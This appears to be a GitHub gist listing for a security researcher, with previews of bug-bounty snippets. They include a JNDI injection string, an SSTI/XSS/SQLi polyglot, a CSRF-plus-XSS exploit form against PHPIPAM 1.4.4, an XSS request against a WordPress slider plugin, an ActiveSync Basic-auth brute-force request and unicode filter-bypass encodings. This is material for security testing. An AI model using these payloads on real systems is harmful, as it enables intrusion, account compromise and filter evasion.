Skip to content

Instantly share code, notes, and snippets.

View incogbyte's full-sized avatar
:shipit:
./../../../../../${jndi:ldap://127.0.0.1#{{${hostName}.{lol}}}/{{random}}}

(inc0gbyt3) incogbyte

:shipit:
./../../../../../${jndi:ldap://127.0.0.1#{{${hostName}.{lol}}}/{{random}}}
106 followers · 67 following
View GitHub Profile
@incogbyte
incogbyte / base64PassGen.py
Created February 15, 2022 14:05
Small script to generate base64 passwords like, admin:admin
import os
import sys
import base64
'''
Small script to generate base64 passwords like, YWRtaW46YWRtaW4=
usage
@incogbyte
incogbyte / polyglotFinder.txt
Created February 28, 2022 13:36
payload finder polyglot ssti,xss,sqli
${{<%[%'"}}%\.vult00
@incogbyte
incogbyte / wordpress_downloader.py
Created July 29, 2022 14:34
download plugins for wordpress
from shutil import ExecError
import requests
from bs4 import BeautifulSoup
import os
import wget
from concurrent.futures import ThreadPoolExecutor
import zipfile
def wordpress_plugin():
urls = []
@incogbyte
incogbyte / exploit.html
Created January 18, 2022 17:44
XSS + CSRF - PHPIPAM Version 1.4.4
<html>
<body>
<h1> Exploit PHPIPAM </h1>
<p><strong> By: Incogbyte </strong></p>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php" method="POST">
<input type="hidden" name="container" value="body" />
<input type="hidden" name="placement" value="top" />
<input type="hidden" name="sectionid" value="2&apos;&gt;&lt;input&#32;onpointerleave&#61;&quot;alert&#40;1&#41;&quot;&gt;incogbyte&lt;&#47;input&gt;&lt;script&gt;alert&#40;&apos;incogbyte&apos;&#41;&lt;&#47;script&gt;" />
<input type="hidden" name="original&#45;title" value="Search&#32;for&#32;free&#32;subnets&#32;in&#32;section&#32;" />
@incogbyte
incogbyte / request.md
Last active December 11, 2022 11:49
xss huge-it v4.0.8 
POST /wp-admin/admin.php?page=hugeit_slider HTTP/1.1
Host: localhost:8000
Content-Length: 53
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8000
@incogbyte
incogbyte / options_brute_microsoft.md
Last active December 20, 2022 12:21
options_brute_microsoft 
OPTIONS /Microsoft.Server-ActiveSync
Host: outlook.office365.com
Connection: Close
MS-ASProtocol: 14.0
Content-Length: 0
Authorization: Basic usermail:pass
@incogbyte
incogbyte / dorks.txt
Created July 11, 2022 12:51
small google foo, search info about targets domains.txt
"site:ideone.com | site:codebeautify.org | site:codeshare.io | site:codepen.io | site:repl.it | site:justpaste.it | site:pastebin.com | site:jsfiddle.net | site:trello.com | site:.attlasian.net "target" "
@incogbyte
incogbyte / juicy.sh
Created January 9, 2020 15:14
fast juicy files with tomnomnom wordlist and ffuf tool
#!/bin/sh
#tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51
# ffuf tool https://github.com/ffuf/ffuf
# put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to
# /usr/local/bin too.. after that.. execute juicy.sh at any terminal.
# usage bash juicy.sh filename.txt
filename="$1"
while read -r line; do
name="$line"
@incogbyte
incogbyte / burpsuitePassThrough.txt
Created April 7, 2023 20:26
Burp Proxy Pass Through
Burp Suite > Proxy > Options > TLS Pass Through.
Add these:
*.google\.com
.*.gstatic).com
*.mozilla\.com
.*\.googleapis\.com
*.pkil.goog
@incogbyte
incogbyte / unincodes.txt
Created May 1, 2023 12:08
List of useful unicodes to bypass some filters
#### unicodes - single quote
%u0027
%u02b9
%u02bc
%u02c8
%c0%27
%c0%a
%e0%80%a7